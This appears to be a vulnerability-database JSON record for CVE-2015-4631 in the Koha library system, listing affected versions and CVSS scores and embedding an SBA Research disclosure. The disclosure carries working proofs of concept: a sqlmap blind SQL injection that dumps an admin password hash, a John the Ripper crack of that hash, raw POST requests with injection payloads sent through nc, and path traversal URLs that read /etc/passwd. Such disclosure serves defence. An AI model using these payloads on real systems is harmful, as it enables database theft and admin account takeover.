        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.14.x"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.20.1"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.18.x"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.18.08"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.05"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.06"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.00"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.03"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.04"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.01"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.02"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.20"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.18.7"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.18"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.16.11"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.16"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.20.1"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.18.8"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.16.12"
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4631"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:koha:koha",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Raschin Ghanad-Tavakoli",
    "sources": [
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2015-4631",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 3.5,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 6.8,
            "id": "CVE-2015-4631",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "LOW",
            "trust": 1.8,
            "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2015-05198",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2015-05201",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2015-05199",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2015-05200",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2015-05197",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.2,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.9 [IVD]"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "72631f14-1e6e-11e6-abef-000c29c66e3d",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.2,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.9 [IVD]"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.2,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.9 [IVD]"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.2,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.9 [IVD]"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.2,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.9 [IVD]"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.3,
            "id": "CVE-2015-4631",
            "impactScore": 2.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "trust": 1.8,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2015-4631",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2015-4631",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05198",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05201",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05199",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05200",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05197",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201512-696",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "IVD",
            "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "LOW"
          },
          {
            "author": "IVD",
            "id": "72631f14-1e6e-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "LOW"
          },
          {
            "author": "IVD",
            "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "LOW"
          },
          {
            "author": "IVD",
            "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "LOW"
          },
          {
            "author": "IVD",
            "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "70a561b4-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "72631f14-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "747c9c94-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "182e31fa-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "1ad25ddc-1e6e-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008219"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-696"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4631"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl. Koha contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. Koha is the first open source library automation system. Koha has a SQL injection vulnerability that allows an attacker to exploit a vulnerability to access or modify database data. Koha is prone to the following security vulnerabilities:\n1. Multiple SQL-injection vulnerabilities\n2. Multiple directory-traversal vulnerabilities\n3. Multiple HTML Injection vulnerabilities\n4. Multiple cross-site scripting vulnerabilities\n5. 
Multiple cross site request forgery vulnerabilities\nAn attacker may leverage these issues to access or modify data, exploit latent vulnerabilities in the underlying database, read arbitrary files,allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and to perform unauthorized actions in the context of a logged-in user of the affected application.This may aid in further attacks. ===============================================================================================\nSBA Research Vulnerability Disclosure\u00a0\n===============================================================================================\n\ntitle: \t\t\t        Koha Unauthenticated SQL injection\nproduct: \t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Koha ILS\naffected version:\t3.20.x \u003c= 3.20.1, 3.18.x \u003c= 3.18.8, 3.16.x \u003c= 3.16.12\nfixed version:\t\t3.20.1, 3.17.8, 3.16.12\nCVE numbers:\tCVE-2015-4633, CVE-2015-4632, CVE-2015-4631\nimpact:\t\t\tcritical\nwebsite:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://www.koha-community.org/\n\nfound by:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Raschin Tavakoli / SBA Research Combinatorial Security Testing 
Group\ncontact:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0cst@sba-research.org\n\n\nReferences:\t\thttp://koha-community.org/security-release-koha-3-20-1/\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://koha-community.org/security-release-koha-3-18-8/\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://koha-community.org/security-release-koha-3-16-12/\n\n\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u200bhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423\n\n===============================================================================================\n\n=========================\n1. Mutiple SQL Injections\n=========================\n\n+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +\n+ a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633) \u00a0 +\n+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +\n\nVulnerability:\n--------------\nThe url parameter \u0027number\u0027 in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI. If the webserver is misconfigured, the file-system may be accessed as well. 
\n\nReferences:\n-----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412\n\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n1. Inspect Koha database schema\n\n\u00a0 \u00a0Have a look at how to query the database for superlibrarian users:\n\u00a0 \u00a0http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians\n\n\u00a0 \u00a0So basically we we need to execute some SQL statement like this:\n\u00a0 \u00a0sql-shell\u003e select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;\n\n2. Query the database with sqlmap\n\n\u00a0 \u00a0So let\u0027s fire up sqlmap with the --sql-shell parameter and input the query:\n\n\u00a0 \u00a0root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0_\n\u00a0 \u00a0 ___ ___| |_____ ___ ___ \u00a0{1.0-dev-nongit-20150513}\n\u00a0 \u00a0|_ -| . | | \u00a0 \u00a0 | .\u0027| . |\n\u00a0 \u00a0|___|_ \u00a0|_|_|_|_|__,| \u00a0_|\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0|_| \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 |_| \u00a0 http://sqlmap.org\n\n\n\u00a0 \u00a0[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\u0027s responsibility to obey all applicable local, state and federal laws. 
Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n\n\u00a0 \u00a0[*] starting at 09:20:07\n\n\n\u00a0 \u00a0[09:20:07] [INFO] testing connection to the target URL\n\u00a0 \u00a0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:\n\u00a0 \u00a0---\n\u00a0 \u00a0Parameter: number (GET)\n\u00a0 \u00a0 \u00a0 \u00a0Type: AND/OR time-based blind\n\u00a0 \u00a0 \u00a0 \u00a0Title: MySQL \u003e= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)\n\u00a0 \u00a0 \u00a0 \u00a0Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)\n\u00a0 \u00a0---\n\u00a0 \u00a0[09:20:09] [INFO] testing MySQL\n\u00a0 \u00a0[09:20:09] [INFO] confirming MySQL\n\u00a0 \u00a0[09:20:09] [INFO] the back-end DBMS is MySQL\n\u00a0 \u00a0web server operating system: Linux Debian\n\u00a0 \u00a0web application technology: Apache 2.4.10\n\u00a0 \u00a0back-end DBMS: MySQL \u003e= 5.0.0\n\u00a0 \u00a0[09:20:09] [INFO] calling MySQL shell. To quit type \u0027x\u0027 or \u0027q\u0027 and press ENTER\n\n\n\u00a0 \u00a0sql-shell\u003e select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;\n\u00a0 \u00a0[09:20:25] [INFO] fetching SQL SELECT statement query output: \u0027select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1\u0027\n\u00a0 \u00a0[09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind\n\u00a0 \u00a0[09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait.............................. 
\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\n\u00a0 \u00a0[09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors\u00a0\n\u00a0 \u00a0admin\n\u00a0 \u00a0[09:21:46] [INFO] retrieved: $2a$08$taQ\n\u00a0 \u00a0[09:23:33] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:23:33] [WARNING] increasing time delay to 5 seconds\u00a0\n\u00a0 \u00a0afOgEEhU\n\u00a0 \u00a0[09:25:10] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:25:10] [WARNING] increasing time delay to 6 seconds\u00a0\n\u00a0 \u00a0t/gW\n\u00a0 \u00a0[09:26:13] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:26:13] [WARNING] increasing time delay to 7 seconds\u00a0\n\u00a0 \u00a0TOmqnYe1Y6ZNxCENa\n\u00a0 \u00a0[09:29:57] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:29:57] [WARNING] increasing time delay to 8 seconds\u00a0\n\u00a0 \u00a02.ONk2eZhnuEw5z9OjjxS\n\u00a0 \u00a0[09:35:08] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:35:08] [WARNING] increasing time delay to 9 seconds\u00a0\n\n\u00a0 \u00a0select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;: \u00a0 \u00a0\n\u00a0 \u00a0\u0027admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS\u0027\n\n3. 
Feed john the ripper and be lucky\n\n\u00a0 \u00a0root@kali:/home/wicked# echo \"$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS\" \u003e ./admin-pass\n\u00a0 \u00a0root@kali:/home/wicked# john ./admin-pass\u00a0\n\u00a0 \u00a0Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])\n\u00a0 \u00a0admin \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0(?)\n\u00a0 \u00a0guesses: 1 \u00a0time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) \u00a0c/s: 260 \u00a0trying: Smokey - allstate\n\u00a0 \u00a0Use the \"--show\" option to display all of the cracked passwords reliably\n\n\u00a0 \u00a0root@kali:/home/wicked# john ./admin-pass --show\n\u00a0 \u00a0?:admin\n\n\u00a0 \u00a01 password hash cracked, 0 left\n\n4. If the webserver is misconfigured, read \u0026 write access to the filesystem may be possible. \n\nReferences:\n-----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n====================================================================\n1. 
\"Criteria\" Parameter, Payload: ELT(1=1,\u0027evil\u0027) / ELT(1=2,\u0027evil\u0027)\n====================================================================\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 186\\r\\n\\r\\nFilter=P_COM\u0026Filter=\u0026Limit=\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=%3B\u0026report_name=\u0026do_it=1\u0026userid=\u003cusername\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026koha_login_context=intranet\u0026Criteria=ELT(1=2,\u0027evil\u0027)\" | nc testbox 9002\n\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 186\\r\\n\\r\\nFilter=P_COM\u0026Filter=\u0026Limit=\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=%3B\u0026report_name=\u0026do_it=1\u0026userid=\u003cusername\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026koha_login_context=intranet\u0026Criteria=ELT(1=1,\u0027evil\u0027)\" | nc testbox 9002\n\n====================================================================\n2. 
\"Filter\" Parameter, Payload: P_COM\u0027+AND+\u0027a\u0027=\u0027a / P_COM\u0027+AND+\u0027a\u0027=\u0027b\n====================================================================\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 183\\r\\n\\r\\nkoha_login_context=intranet\u0026Limit=\u0026Criteria=branchcode\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=;\u0026report_name=\u0026do_it=1\u0026userid=\u003cuserid\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026Filter=P_COM\u0027+AND+\u0027a\u0027=\u0027a\" | nc testbox 9002\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 183\\r\\n\\r\\nkoha_login_context=intranet\u0026Limit=\u0026Criteria=branchcode\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=;\u0026report_name=\u0026do_it=1\u0026userid=\u003cuserid\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026Filter=P_COM\u0027+AND+\u0027a\u0027=\u0027b\" | nc testbox 9002\n\n====================================================================\n\nYou will notice different output in every second request, demonstrating the evaluation of the payload. \n\n# ################################################################################################## #\n# PoC End\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n=================================\n3. Path Traversal (CVE-2015-4633)\n=================================\n\nVulnerability\n-------------\nThe \"template_path\" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is vulnerable to Path Traversal. 
\n\nReferences\n----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408\n\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\nThe following input is used to print out /etc/passwd:\n\n/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\n/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\n\n# ################################################################################################## #\n# PoC End\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n=================================\n4. The site also lacks in the implementation of challenge tokens that prevent cross-site\u00a0\nforgery (XSRF) attacks. \u00a0\n\nThe attack can be performed by:\n\n- through a compromised user account. 
